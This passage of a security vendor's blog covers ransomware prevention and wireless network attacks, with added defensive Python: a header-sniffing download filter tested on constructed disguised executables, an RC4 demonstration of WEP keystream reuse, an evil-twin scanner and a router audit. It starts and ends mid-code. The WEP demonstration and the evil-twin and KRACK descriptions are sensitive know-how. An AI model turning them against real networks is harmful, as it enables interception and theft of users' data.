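                return "pe"
        return "dos-mz"
    if data[:4] == b"\x7fELF":
        return "elf"
    if data[:4] in (b"\xfe\xed\xfa\xce", b"\xfe\xed\xfa\xcf",
                    b"\xce\xfa\xed\xfe", b"\xcf\xfa\xed\xfe", b"\xca\xfe\xba\xbe"):
        return "mach-o"  # 0xCAFEBABE is also a Java class file; both executable
    if data[:2] == b"#!":
        return "script"
    if data[:4] == b"PK\x03\x04":
        return "zip"     # archives (and .jar/.docx) may hold an installer
    if data[:8] == b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1":
        return "ole"     # .msi installers and legacy Office documents
    return None


def decide(filename, content_type, data):
    """Return ('allow' | 'inspect' | 'block', reason) for one download."""
    kind = content_kind(data)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if kind in BLOCK_KINDS:
        return "block", f"{kind} content served as {content_type!r} with .{ext}"
    if kind in INSPECT_KINDS:
        return "inspect", f"{kind} container; unpack and scan members"
    if ext in EXECUTABLE_EXTENSIONS:
        return "block", f"executable extension .{ext}"
    return "allow", "no executable indicators"


def minimal_pe():
    """Constructed PE image: DOS header with e_lfanew=0x40, then 'PE\\0\\0'."""
    return b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40) + b"PE\0\0"


if __name__ == "__main__":
    samples = [
        ("officefix-crack-full-version.pdf", "application/pdf", minimal_pe()),
        ("setup-starter_v2.3.1.exe", "application/octet-stream", b"not a PE"),
        ("wallpaper.png", "image/png", b"\x7fELF" + b"\0" * 12),
        ("report.pdf", "application/pdf", b"%PDF-1.7\n"),
        ("bundle.zip", "application/zip", b"PK\x03\x04" + b"\0" * 26),
        ("helper.txt", "text/plain", b"#!/bin/sh\necho hi\n"),
    ]
    for name, ctype, data in samples:
        print(f"{name:34s} {decide(name, ctype, data)}")
```

Extension checks remain as a fallback for content the sniffer does not recognise, but the content check comes first because that is the one an attacker cannot defeat simply by renaming the dropper.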
For further information on content filtering with a DNS filter and other cybersecurity measures you can implement to protect against malware, contact TitanHQ today. The WebTitan web filter is available on a free trial, can be implemented in minutes, and shows positive results in under an hour.
Over the past 12 months the number of successful ransomware attacks has increased sharply. Many attacks have been headline news due to the disruption they have caused and the high cost of remediation. The healthcare industry in the United States has been targeted, with the attacks disrupting patient care and putting patient safety at risk. Recently there was an attack on Colonial Pipeline that resulted in the shutdown of a main fuel pipeline serving the East Coast of the United States, while JBS suffered an attack that threatened food production at its U.S. plants.
Ransom payments have also increased and threat actors are stealing data prior to encrypting files to increase the pressure on victims to pay up. Regardless of whether the ransom is paid, the recovery process is slow. Many victims have suffered disruption to business operations for several months and businesses have been forced to permanently close after an attack due to the high costs of recovery.
Ransomware gangs have conducted highly sophisticated attacks, but for the most part they have exploited vulnerabilities in security defenses that should not have existed. Most attacks exploit weaknesses that could have been easily addressed had network security best practices been followed. So what mistakes are businesses making that leave them vulnerable to ransomware attacks?
Security Mistakes That Make Life Easy for Ransomware Gangs
In order for ransomware gangs to conduct a successful attack they must first gain access to the business network by exploiting security vulnerabilities.
While there are many possible attack vectors, the most common is phishing. A phishing campaign is conducted with one of two aims: to steal credentials that allow perimeter defenses to be bypassed, or to install malware that gives the attackers persistent access to the network.
With credential theft, the aim is to obtain credentials of an individual with high-level privileges such as the CEO. With high privileges, an attacker can easily gain persistent access to the network and move laterally. Alternatively, campaigns can be conducted to target lower-level employees and trick them into installing malware.
Most businesses have implemented a spam filter to block malicious messages, but many rely on default Office 365 spam filters, which do not offer a high enough level of protection. Implementing an advanced AI-based spam filter with sandboxing will improve protection.
Stolen credentials allow an attacker to access network resources, but not if multi-factor authentication has been implemented. While not infallible, multi-factor authentication will prevent attackers from using stolen credentials to gain access to networks in the vast majority of cases.
Anti-spam solutions and multi-factor authentication will provide protection from email attacks, but ransomware and other malware are often downloaded via the internet. By implementing a web filtering solution, employees can be prevented from visiting malicious websites and malware downloads can be blocked. Many businesses fail to protect against the web-based component of attacks.
Security Awareness Training
Many businesses rely on technical measures to block threats and neglect the human element. Attacks often target employees, so it is important for security awareness training to be provided and for regular refresher sessions to be conducted to reinforce training. Without training, employees cannot be expected to recognize and avoid threats.
Patching and Software Updates
Vulnerabilities in software, firmware, and operating systems are often exploited. Prompt patching is therefore important. It can be difficult to stay on top of patches and security updates, so patching should be prioritized. Many ransomware attacks have succeeded by exploiting years-old vulnerabilities. If vulnerabilities are not addressed, it will only be a matter of time before they are exploited.
Brute force tactics to guess weak passwords are often effective. As well as creating password policies that require all default passwords to be changed and strong passwords to be set, those policies must be enforced. Provide employees with tools to make creating strong passwords easier, such as providing them with a password management solution.
In the event of an attack, it is vital that damage is limited. Network segmentation is important in this regard. If an attacker bypasses the perimeter defenses, they should not be able to access the entire network. Segmenting the network will limit the potential for lateral movement and minimize the damage that can be caused.
Incident Response Plan
Businesses that have prepared for the worst and have developed and tested an incident response plan will recover much faster and will be able to limit the harm caused. Importantly, the business will be able to continue to operate while the attack is remediated.
Many businesses mistakenly believe that having backups will allow them to recover quickly in the event of an attack when that is often not the case. Regular backups must be created, and those backups must be tested to make sure file recovery is possible and data have not been corrupted. One copy of a backup must also be stored on an isolated system or device that cannot be accessed from the network where the data resides.
Businesses that address these common security mistakes will make it much harder for ransomware gangs to breach their defenses.
The best place to start is by speaking to TitanHQ’s security experts about implementing cybersecurity solutions to block the most common attack vectors. Give the TitanHQ team a call today and take the first step toward improving your security posture against ransomware, malware, and phishing attacks.
The pandemic forced businesses to adopt different working practices. Rather than having employees working from the office, restrictions introduced to combat COVID-19 meant businesses had to allow their employees to work from home. Protecting business networks when virtually all workers are accessing those networks remotely was a major challenge and it was inevitable that vulnerabilities would be introduced that could potentially be exploited by threat actors.
Those vulnerabilities were exploited, with cybercriminals and APT groups targeting at-home workers mostly by exploiting vulnerabilities in remote access systems and through phishing attacks to obtain credentials to allow networks to be accessed. While these attacks had many different goals, one of the most common was to encrypt files using ransomware to prevent them from being accessed, usually with data theft prior to file encryption.
According to Osterman Research, the three main priorities for cybersecurity in 2021 are protecting endpoints, educating users about ransomware and stopping them from becoming victims of attacks, and protecting backups from ransomware. The fact that two of the three main priorities are related to ransomware shows just how serious the threat has become.
Protecting endpoints requires a combination of cybersecurity solutions, one of the most important being an advanced email security solution. Email is the attack vector of choice in cyberattacks and is commonly the initial attack vector in ransomware attacks. Phishing campaigns are easy to conduct and they target the weakest link in cybersecurity – employees. Further, with many employees working from home, phishing has become even easier. Studies have shown at-home employees have been taking security shortcuts, with many also admitting to clicking links in phishing emails and opening potentially malicious email attachments. When errors such as this are made, many employees fail to report the matter to their IT department out of fear of reprisals.
Cybersecurity training is important to teach and reinforce cyber hygiene best practices and raise awareness of the threat from ransomware. If employees are not taught how to identify phishing emails and ransomware, they cannot be expected to avoid those threats. With training, susceptibility to phishing can be greatly reduced. However, even with training employees will make mistakes and will fail to recognize every threat.
A recent study conducted by Osterman Research and TitanHQ looked into the main cybersecurity threats faced by security professionals in 2021. The biggest threats were found to be business email compromise (BEC) attacks that tricked employees, phishing messages that result in malware infections, and phishing messages that result in account compromises. The latter is usually the first step in a BEC attack. 85% of interviewed organizations said they had experienced at least one security incident in the past 12 months, and while security professionals were aware of the dangers of phishing and ransomware attacks, only 37% rated their defenses as highly effective.
Due to the lack of confidence in defenses against phishing and ransomware attacks identified by the study, TitanHQ and Osterman Research are hosting a webinar in which attendees will discover the most effective mitigations against phishing and ransomware attacks and will learn best practices they need to adopt to avoid those threats.
Webinar attendees will also learn about the full findings of the in-depth cybersecurity study into the rising threat from phishing and ransomware and how risk can be reduced to a low and acceptable level.
The webinar will be taking place on June 30, 2021:
How to Reduce the Risk of Phishing and Ransomware Attacks
Wednesday, June 30, 2021
7:00 p.m. to 8:00 p.m. BST
2:00 p.m. to 3:00 p.m. EST
11:00 a.m. to 12:00 p.m. PST
The webinar will be conducted by Michael Sampson, Senior Analyst at Osterman Research, and Sean Morris, Chief Technology Officer at TitanHQ.
In this post, we explore some of the common wireless network attacks and offer advice on simple steps that can be taken to secure wireless networks and prevent costly data breaches.
Many Businesses are Neglecting WiFi Security
Many businesses have moved from wired to wireless technologies, which has had a negative impact on their security posture. Wired networks are generally a lot easier to secure than wireless networks, and poor implementation often introduces vulnerabilities in WiFi networks. Many businesses also fail to perform a thorough risk analysis, which means those vulnerabilities are not identified and addressed. Because of these security flaws, and the ease of exploiting them, wireless network attacks are common.
The Importance of WiFi Security
Wi-Fi access used to be something you had to pay for, but now free WiFi is something many people take for granted. Visitors to a hotel, coffee shop, bar, retail outlet, or restaurant now expect WiFi to be provided free of charge. The decision to use a particular establishment is often influenced by whether free WiFi is available, but increasingly the quality of the connection is a factor in the decision process.
The quality of the WiFi on offer is not just a question of there being enough bandwidth and fast internet speeds. Parents often choose to visit establishments that provide secure WiFi with content control, for instance, businesses that have been verified under the Friendly WiFi scheme. In order to be accredited under the scheme, businesses must have implemented appropriate filtering controls to ensure minors are prevented from accessing age-inappropriate material.
The massive rise in cyberattacks via public WiFi networks coupled with warnings about WiFi risks in the mainstream media has seen many consumers favor establishments that offer secure WiFi access.
If you run a business and are providing WiFi to customers or if you are considering adding a WiFi hotspot to attract more customers, be sure to consider the security of the network. The past couple of years have seen many attacks on WiFi networks and customers who use those wireless services. The increase in WLAN attacks means WiFi security has never been so important.
Before covering some of the most common wireless attacks, it is worthwhile exploring some of the common wireless network vulnerabilities that can be exploited to eavesdrop on traffic, infect users with malware, and steal sensitive information.
Common Wireless Vulnerabilities
Listed below are some of the most common wireless network vulnerabilities and steps that can be taken to prevent the vulnerabilities from being exploited. These wireless network vulnerabilities could easily be exploited in real-world attacks on wireless networks to steal sensitive data, take control of a router or connected device, or install malware or ransomware.
Use of Default SSIDs and Passwords
WiFi access points are shipped with a default SSID and password which need to be changed, but all too often, those default passwords are left in place. That makes it easy for an attacker to log in and take control of the router, change settings or firmware, load malicious scripts, or even change the DNS server so that all traffic is directed to an IP owned by the attacker. Default passwords must be changed to prevent anyone within range of the signal from connecting and sniffing traffic.
If wireless controllers are used to manage WiFi access points via web interfaces, make sure the default passwords are also changed. These default passwords can be easily found online and can be used to attack wireless networks.
Placing an Access Point Where Tampering Can Occur
If the access point is placed in a location where it can be physically accessed, tampering can occur. It takes just seconds to revert the access point to factory default settings. Make sure the access point is located in a secure location, such as a locked closet.
Use of Vulnerable WEP Protocol
The Wired Equivalent Privacy (WEP) protocol was the first protocol used to encrypt wireless traffic. WEP, as the name suggests, was intended to make wireless networks as secure as their wired counterparts, but that does not make WEP wireless networks secure.
WEP is based on the RC4 cipher; the problem is not the cipher itself but how RC4 is used in WEP. WEP allows an initialization vector to be re-used, and because the per-packet RC4 key is simply the IV prepended to the fixed shared key, a repeated IV means a repeated keystream. Re-using a keystream is never a good idea, and it allows an attacker to crack the encryption with ease. Several other vulnerabilities have been identified in WEP which make it far from secure.
Even though WEP has been deprecated and there are much more secure wireless encryption protocols to use, many businesses continue to use WEP in the mistaken belief that it is secure. WEP is more secure than no encryption at all – bad security is better than no security – but there are much more secure options for encrypting WiFi traffic. If you want to improve security and prevent WLAN attacks, upgrade to WPA2 or WPA3, which use the much more secure Advanced Encryption Standard (AES) and lack the vulnerabilities of WEP.
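The following Python example is added here and is not code from the article: it shows, with a textbook RC4 implementation and constructed key, IVs and messages, why a repeated WEP IV matters. Two frames sent under the same IV share a keystream, so XOR-ing their ciphertexts cancels that keystream and leaves the XOR of the two plaintexts, and the birthday bound shows how few frames it takes before a 24-bit IV repeats.

```python
"""Added example (not code from the article): why a repeated WEP IV leaks data.

WEP seeds RC4 with the 24-bit IV prepended to the shared key, so two frames
that carry the same IV are encrypted with the same keystream. XOR-ing those
two ciphertexts cancels the keystream and leaves plaintext1 XOR plaintext2,
whatever the strength of RC4 itself. The key, IVs and messages are constructed
test values; the CRC-32 integrity value that real WEP appends is omitted.
"""
import math


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4: key-scheduling (KSA) followed by keystream generation (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % 256])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncating to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP-style encryption: the per-packet RC4 key is IV || shared key."""
    if len(iv) != 3:
        raise ValueError("WEP IVs are 24 bits (3 bytes)")
    return xor_bytes(plaintext, rc4_keystream(iv + shared_key, len(plaintext)))


def keystream_cancels(shared_key, iv1, iv2, p1, p2) -> bool:
    """True when c1 XOR c2 == p1 XOR p2, i.e. both frames used one keystream.

    Anyone holding the two ciphertexts then learns the XOR of the plaintexts
    without knowing the key; this is exactly what a repeated IV hands over.
    """
    c1 = wep_encrypt(shared_key, iv1, p1)
    c2 = wep_encrypt(shared_key, iv2, p2)
    return xor_bytes(c1, c2) == xor_bytes(p1, p2)


def frames_until_iv_repeat(iv_bits: int = 24, probability: float = 0.5) -> int:
    """Birthday bound: frames with random IVs before a repeat reaches `probability`.

    For WEP's 24-bit IV this is only a few thousand frames, which a busy
    access point sends in minutes; a sequential IV counter wraps after 2**24.
    """
    n = 2 ** iv_bits
    return math.ceil(math.sqrt(2 * n * math.log(1 / (1 - probability))))


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")          # constructed 40-bit WEP key
    iv = b"\x00\x00\x01"                        # constructed IV
    p1, p2 = b"GET /login HTTP/1.1", b"POST /pay  HTTP/1.1"
    print("same IV leaks p1^p2:", keystream_cancels(key, iv, iv, p1, p2))
    print("fresh IV leaks p1^p2:", keystream_cancels(key, iv, b"\x00\x00\x02", p1, p2))
    print("frames for 50% IV collision:", frames_until_iv_repeat())
```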
WPA2 Krack Vulnerability
WPA may be more secure than WEP, but it is not without its own wireless vulnerabilities. Two Belgian researchers – Mathy Vanhoef and Frank Piessens of the University of Leuven – identified a serious flaw in the WPA security protocol. The flaw was named KRACK, short for Key Reinstallation Attack. The flaw can be exploited in a man-in-the-middle attack to steal sensitive data sent via the WPA encrypted WiFi connection. If the WPA flaw is exploited, an attacker could eavesdrop on traffic and obtain banking credentials, passwords, and credit card information.
The vulnerability exists in the four-way handshake. An encrypted WPA2 connection starts with a four-way handshake, but not all parts of that handshake are required. To speed up re-connections, the third part is retransmitted. That third part of the handshake may be repeated several times, and it is this step that could be used in a wireless network attack.
By repeatedly resetting the nonce transmitted in the third step of the handshake, an attacker can gradually match encrypted packets and discover the full keychain used to encrypt traffic.
A threat actor could set up a clone of a WiFi access point that a user has previously connected to – an evil twin. To the user, nothing would appear untoward as Internet access would be provided via that evil twin. An attacker can force a user to connect to the cloned WiFi network and all information sent via that evil twin WiFi network can be intercepted. While the attack will not work on sites with SSL/TLS encryption, tools can be used that make this possible by forcing a user to visit an HTTP version of the website.
In order to execute a KRACK WiFi attack, the WiFi network must be using WPA2-PSK or WPA-Enterprise and the attacker needs to be within range of the WiFi signal. Virtually all routers currently in use are vulnerable to KRACK WiFi attacks. The best defense is to keep routers up to date and for users to only connect to wireless networks using a paid-for, up-to-date VPN. The issue has been addressed in WPA3, which is supported by the latest wireless access points. However, even with this exceptionally common wireless network vulnerability, WPA2 is still far more secure than WEP.
What are the Most Common Wireless Network Attacks?
Many of the most common wireless network attacks are opportunistic in nature. WiFi hackers look for wireless networks that are easy to attack.
Hackers are more than happy to take advantage of poor security controls to gain access to sensitive information and distribute malware. Why waste time attacking well-secured WiFi networks when there are plenty with scant or no security?
Poorly secured WiFi networks are also targeted by more sophisticated cybercriminals and organized crime groups to gain a foothold in the network. The attacks can be extremely lucrative. Access to a business network can allow ransomware to be installed and if malware can be installed on POS systems, the credit/debit card numbers of tens or hundreds of thousands of customers can be stolen.
Types of Wireless Network Attacks
There are several different types of WiFi attacks that hackers use to eavesdrop on wireless network connections to obtain passwords and banking credentials and spread malware. The main types of WiFi attacks are detailed below.
Fake WiFi Access Points, Evil Twins, and Man in the Middle Attacks
Visitors to hotels, coffee shops, and malls often connect to the free WiFi on offer, but various studies have shown that care is not always taken when connecting. Customers often choose the WiFi access point based on the SSID without checking it is the wireless network set up by a particular establishment for customer use.
Criminals can easily set up fake WiFi access points, often using the name of the establishment in the SSID. An SSID called ‘Free Airport WiFi’ would be enough to get many people to connect. When customers connect to these rogue WiFi networks they can still access the Internet, so are unlikely to realize anything is wrong. However, once connected to that network, everything they do online will be monitored by cybercriminals. Sensitive information entered online, such as email addresses and passwords, credit card numbers, or banking credentials, can and will be stolen.
How is this done? The attacker simply creates a hotspot on a smartphone and pairs it with a tablet or laptop. The hacker can then sit in a coffee shop drinking a latte while monitoring the traffic of everyone that connects. Alternatively, they can use a router with the same name and password as the one currently in use. This may also have a stronger WiFi signal, which may see more people connect. Through the “evil twin” all traffic will be plainly visible to the attacker and all data sent over the network can be captured.
Fake access points and evil twins are among the most common wireless network attacks. They are easy to conduct, require little technical skill, and are very effective. One study indicated more than a third of WiFi hotspot users take no precautions when accessing WiFi hotspots and frequently connect to unsecured networks.
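A defensive counterpart to the fake access point and evil twin attacks described above, added here as an example and not part of the original article: a venue that runs its own hotspot knows which radios (BSSIDs) it deployed and how they are secured, so each periodic scan can be compared against that inventory. The inventory, field names and scan rows below are constructed test data shaped like the output of a wireless survey tool.

```python
"""Added example (not code from the article): spot evil-twin candidates in a scan.

Comparing every scan against an inventory of deployed radios catches the cases
described in the text: an unknown radio broadcasting our SSID, an open network
impersonating a protected one, and look-alike names such as "Free Airport WiFi".
INVENTORY, the Beacon fields and SCAN are constructed test data.
"""
from dataclasses import dataclass
from difflib import SequenceMatcher


@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str       # radio MAC address, lower-case
    security: str    # "OPEN", "WEP", "WPA2" or "WPA3"
    rssi_dbm: int    # signal strength at the sensor; higher (less negative) is stronger


# Authorized deployment (constructed): SSID -> (deployed BSSIDs, expected security)
INVENTORY = {
    "CafeBrew Guest": ({"00:11:22:aa:bb:01", "00:11:22:aa:bb:02"}, "WPA2"),
    "CafeBrew Staff": ({"00:11:22:aa:bb:03"}, "WPA2"),
}

# Constructed scan: one legitimate guest radio, one evil twin with a stronger
# open signal, a staff radio downgraded to WEP, two look-alikes and a neighbour.
SCAN = [
    Beacon("CafeBrew Guest", "00:11:22:aa:bb:01", "WPA2", -55),
    Beacon("CafeBrew Guest", "de:ad:be:ef:00:01", "OPEN", -40),
    Beacon("CafeBrew Staff", "00:11:22:aa:bb:03", "WEP", -60),
    Beacon("Cafe Brew Guest Free", "de:ad:be:ef:00:02", "OPEN", -50),
    Beacon("CafeBrew-Guest", "de:ad:be:ef:00:03", "WPA2", -45),
    Beacon("Starbucks", "aa:bb:cc:dd:ee:ff", "WPA2", -70),
]


def normalize(ssid: str) -> str:
    """Lower-case and drop spaces/punctuation so "CafeBrew-Guest" == "CafeBrew Guest"."""
    return "".join(ch for ch in ssid.lower() if ch.isalnum())


def lookalike(ssid: str, authorized: str, threshold: float = 0.85) -> bool:
    """True if the SSID differs from ours only cosmetically or is very similar."""
    a, b = normalize(ssid), normalize(authorized)
    return a == b or SequenceMatcher(None, a, b).ratio() >= threshold


def analyze(scan, inventory=INVENTORY):
    """Return (code, beacon, detail) tuples for every suspicious beacon."""
    findings = []
    for beacon in scan:
        if beacon.ssid in inventory:
            bssids, expected = inventory[beacon.ssid]
            if beacon.bssid not in bssids:
                strongest_ours = max(
                    (b.rssi_dbm for b in scan if b.bssid in bssids), default=None)
                detail = f"unknown radio advertising our SSID as {beacon.security}"
                if strongest_ours is not None and beacon.rssi_dbm > strongest_ours:
                    detail += "; stronger than our own signal, clients will prefer it"
                findings.append(("UNKNOWN_BSSID", beacon, detail))
            elif beacon.security != expected:
                findings.append(("SECURITY_MISMATCH", beacon,
                                 f"our radio runs {beacon.security}, expected {expected}"))
            continue
        for authorized in inventory:
            if lookalike(beacon.ssid, authorized):
                findings.append(("LOOKALIKE_SSID", beacon,
                                 f"resembles authorized SSID {authorized!r}"))
                break
    return findings


def finding_codes(scan, inventory=INVENTORY):
    """Sorted list of finding codes, handy for alert routing or tests."""
    return sorted(code for code, _, _ in analyze(scan, inventory))


if __name__ == "__main__":
    for code, beacon, detail in analyze(SCAN):
        print(f"{code:18} {beacon.bssid}  {beacon.ssid!r}: {detail}")
```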
Packet Sniffing: Interception of Unencrypted Traffic
Research by Kaspersky Lab in 2016 showed more than a quarter of public Wi-Fi hotspots set up in malls were insecure and lacked even basic security controls. A quarter did not encrypt traffic at all, while research conducted by Skycure showed that five of the 10 busiest malls in the USA had risky WiFi networks.
One mall in Las Vegas was discovered to be operating 14 risky WiFi access points. Hackers can use packet sniffers to intercept traffic on unencrypted WiFi networks. Packet sniffing is one of the most common wireless attacks.
These common wireless network attacks are easy on older routers, such as those using WEP encryption. WPA offers better security, WPA2 is better still, or ideally, the new WPA3 encryption protocol should be used if it is supported by your access point.
Wardriving is a technique used to identify and map vulnerable access points. The name comes from the fact that attackers drive around a neighborhood and use a laptop with a GPS device and antenna to identify and record the location of wireless networks. This technique is effective since many WiFi networks used by businesses extend beyond the confines of the building and poor security controls are applied to secure those networks.
Warshipping is a more efficient method of attacking WiFi networks as it allows attacks to be conducted remotely, even if the attacker is not within range of a WiFi network. The tactic was explained by IBM X-Force Red researchers at Black Hat USA. They used cheap (under $100) and easy-to-obtain components to create a single-board computer with WiFi and 3G capabilities that runs on a cell phone battery. The device can be used to locally connect to the WiFi network and send information back to the attackers via the 3G cellular connection.
Since the device is small, it can easily be hidden inside a small package, and getting that package into a building is easy. It can just be mailed. Since the package may be addressed to someone not working at the company, it could sit in the mailroom for a while before it is opened. Since the package can be tracked, the attackers will know when it is in the building. Alternatively, it could be hidden in any number of items from plant pots to teddy bears. If the device is within range of WiFi networks, it could be used to attack those networks.
Hashed network access codes can be sent back to the attackers to crack, and the device can then connect to WiFi networks in the building and harvest data. The device could be used in a man-in-the-middle attack by impersonating an internal WiFi network.
Many businesses use MAC filtering to prevent specific devices from connecting to their WiFi networks. While this is useful for preventing individuals from taking advantage of free WiFi for customers, this method of blocking users can be easily bypassed. It is easy to spoof a MAC address and bypass this filtering control.
Examples of WiFi Network Attacks
Attacks on wireless networks are not just theoretical. Listed below are some examples of common wireless network attacks that have resulted in the installation of malware or theft of sensitive information. These latest wireless security attacks could easily have been prevented had appropriate security controls been implemented.
Latest Wireless Security Attacks
Tel Aviv Free WiFi Network Hacking Incident
One notable example of how easy it can be for a hacker to take over a WiFi network comes from Tel Aviv. Tel Aviv offers a city-wide free WiFi network, which incorporates basic security controls to keep users secure on the network. However, it did not prove to be as secure as city officials thought.
While commuting home, Tel Aviv resident Amihai Neiderman noticed a new WiFi access point had appeared. The FREE_TLV access point was provided by the city and Neiderman decided to test its security controls. After determining the IP address through which WiFi clients accessed the Internet, he disconnected, scanned the router, and discovered the web-based login interface was run through HTTPS port 443.
While he found no obvious vulnerabilities at first, after extensive analysis he identified a buffer overflow vulnerability which he successfully exploited to take full control of the router. By doing so, if he had been so inclined, he could have intercepted the traffic of tens of thousands of users.
Toasters Used to Hack Unsecured WiFi Networks
Perhaps not one of the most common WiFi network attacks, but notable nonetheless due to the rise in the use of IoT devices. IoT capability has been incorporated into all manner of devices from toasters to washing machines. These devices can be vulnerable to supply chain attacks – where hardware is altered to allow the devices to be used to attack WiFi networks. In 2016, Russian officials discovered chips imported from China had been altered and were being used to spread malware that could eavesdrop on unsecured WiFi networks from a range of 200 meters. They were used to infect those networks with malware that could steal information.
In-Flight WiFi Network Hacking from the Ground
Cybersecurity expert Ruben Santamarta has demonstrated it is possible to hack into airline WiFi networks from the ground, view the internet activity of passengers, and intercept their information. More worryingly, he was also able to gain access to the cockpit network and SATCOM equipment. He claims the same technique could be used for ships, industrial facilities, and even military installations. He explained how he did it in his “Last Call for SATCOM Security” presentation at the Black Hat 2018 conference.
Orange Modems Leaking Wi-Fi Passwords
A vulnerability has been identified in Orange LiveBox ADSL modems that causes them to leak the SSID and WiFi passwords in plaintext. The flaw was identified by Bad Packets researchers who observed their honeypots being actively attacked. A search on Shodan showed there are nearly 20,000 vulnerable Orange modems that leak Wi-Fi passwords and SSIDs in plaintext. In many cases, the default credentials of admin/admin were still being used! The flaw means the WiFi networks could easily be attacked remotely. Attackers could change device settings, alter firmware, and even obtain the phone number and conduct a range of other attacks.
WeWork WiFi Security Flaws
WeWork, a provider of custom workspaces, private offices, and on-demand workspaces equipped with high-bandwidth WiFi, has made an error implementing those WiFi networks which makes them far from secure.
WeWork used the same WiFi password at many of its shared offices for several years. To make matters worse, that password was weak and regularly features in the top 25 lists of extremely poor passwords. However, there was no need to guess it as it was available through the WeWork app in plaintext. Such a simple yet serious error placed all users of those workspaces at risk for several years. The researchers investigated several locations in San Francisco and found the same weak password used at multiple locations. Further, the WiFi network was only protected with WPA2 Personal security.
Teemu Airamo checked the security of the workspace he had just moved into and found hundreds of other companies’ devices exposed. Subsequent scans on the WeWork network revealed an enormous amount of sensitive data had been exposed. Password reuse is never a good idea, and neither is using dictionary words or heaven forbid, any of the top 25 lists of shockingly awful passwords.
WiFi Networks Can be Used to Gain Access to Business Data
Creating a WiFi network for guests is simple. Ensuring it is secure and cannot be used for attacks on the business network or customers requires more thought and effort. Any business that allows customers to make purchases using credit and debit cards is a major target for hackers and poor WiFi security is likely to be exploited sooner or later. The past few years have seen many major attacks that have resulted in malware being installed on POS systems. These are now some of the most common wireless network attacks.
How Can Businesses Prevent the Most Common Wireless Network Attacks?
How can businesses protect against some of the most common wireless network attacks? While it is difficult to prevent the creation of fake WiFi hotspots, there are steps that can be taken to prevent many common wireless network attacks and keep the WiFi network secure.
Isolate the Guest Network
If your business network is not isolated from your guest WiFi network, it could be used to gain access to business data and could place your POS at risk of compromise. Use a router that offers multiple SSIDs – most modern routers have that functionality. These routers often have a guest SSID option or separate guest portal. Make sure it is activated when it is deployed. Alternatively, your wireless router may have a wireless isolation feature that will prevent WiFi users from accessing your internal network and other client devices. If you require multiple access points throughout your establishment, you are likely to need a VLAN or EoIP tunnel configuration – a more complicated setup that will require you to seek professional advice on security.
Encrypt WiFi Traffic with WPA2 or WPA3
If you have an old router that does not support WPA2 encryption it’s time for an upgrade. WPA2 is the minimum standard for WiFi security, and while it can still be cracked, it is time-consuming and difficult. WPA3 has now been released and an upgrade should be considered. You should also make sure that WPS is turned off.
Update Firmware Promptly
All software and devices contain vulnerabilities and require updating. Software should be patched and devices such as routers will need to have their firmware upgraded when new versions are released. Check your device manufacturer’s website periodically for details of firmware updates and ensure your device is updated.
Create a Secure SSID
Your router will have a default SSID name, but this should be changed to personalize it to your business. If you make it easily identifiable, it will reduce the potential for rogue access points to be confused with your own. Ensure that you enforce WPA2 encryption with a shared key and post that information for your customers along with your SSID in a prominent place where they can see it.
Restrict WiFi Access
If your wireless router or access point is too powerful, it could be accessed from outside your premises. Choose a router that allows you to alter the strength of your signal and you can ensure only your customers will use your connection. Also, ensure that your WiFi access point is only available during business hours. If your access points are left unsupervised when your business is closed, it increases the risk of an attack.
Secure Your Infrastructure
Administrator access can be abused, so ensure that your login name and your passwords are secure. If the default credentials are not changed, it will only be a matter of time before they are abused. Change the username from ‘admin’ or any other default username. Set a strong password that includes upper and lower-case letters, at least one number, and a special character. The password must be at least 8 characters although more is better. Alternatively use a 14-character+ passphrase.
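The router hardening steps above (isolated guest network, WPA2/WPA3 with WPS off, current firmware, a non-default SSID, business-hours availability, and non-default administrator credentials) can be turned into a repeatable check. The Python audit below is an added example, not code from the article or from any vendor; the configuration dictionaries, field names and default-SSID patterns are its own assumptions, shaped like an export from a router's admin page.

```python
"""Added example (not code from the article): audit hotspot settings against the
hardening steps in the text. WEAK, HARDENED, LATEST_FIRMWARE, the field names
and DEFAULT_SSID_PATTERNS are constructed for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    severity: str   # HIGH, MEDIUM or LOW
    check: str
    message: str


# Illustrative factory-default SSID shapes (constructed, not a real vendor list).
DEFAULT_SSID_PATTERNS = (r"^(linksys|netgear|dlink|tp-link|default)", r"_[0-9A-F]{4,6}$")
DEFAULT_ADMIN_NAMES = {"admin", "administrator", "root", "user"}
SPECIALS = set("!@#$%^&*()-_=+[]{};:,.<>?/\\|~`'\"")


def password_meets_policy(pw: str) -> bool:
    """Policy from the text: a 14+ character passphrase, or 8+ characters that
    mix upper case, lower case, a digit and a special character."""
    if len(pw) >= 14:
        return True
    return (len(pw) >= 8
            and any(c.isupper() for c in pw)
            and any(c.islower() for c in pw)
            and any(c.isdigit() for c in pw)
            and any(c in SPECIALS for c in pw))


def audit(cfg: dict, latest_firmware: str) -> list[Finding]:
    """Return one Finding per hardening step the configuration fails."""
    findings = []
    mode = str(cfg.get("security_mode", "OPEN")).upper()
    if mode in ("OPEN", "WEP"):
        findings.append(Finding("HIGH", "encryption", f"{mode} gives no real protection; use WPA2 or WPA3"))
    elif mode == "WPA2":
        findings.append(Finding("LOW", "encryption", "WPA2 is the minimum; move to WPA3 once the hardware supports it"))
    if cfg.get("wps_enabled"):
        findings.append(Finding("HIGH", "wps", "WPS is on; turn it off"))
    if not cfg.get("guest_isolation"):
        findings.append(Finding("HIGH", "guest_isolation", "guest clients can reach the internal network and POS"))
    if cfg.get("firmware_version") != latest_firmware:
        findings.append(Finding("MEDIUM", "firmware", f"running {cfg.get('firmware_version')}, vendor offers {latest_firmware}"))
    ssid = str(cfg.get("ssid", ""))
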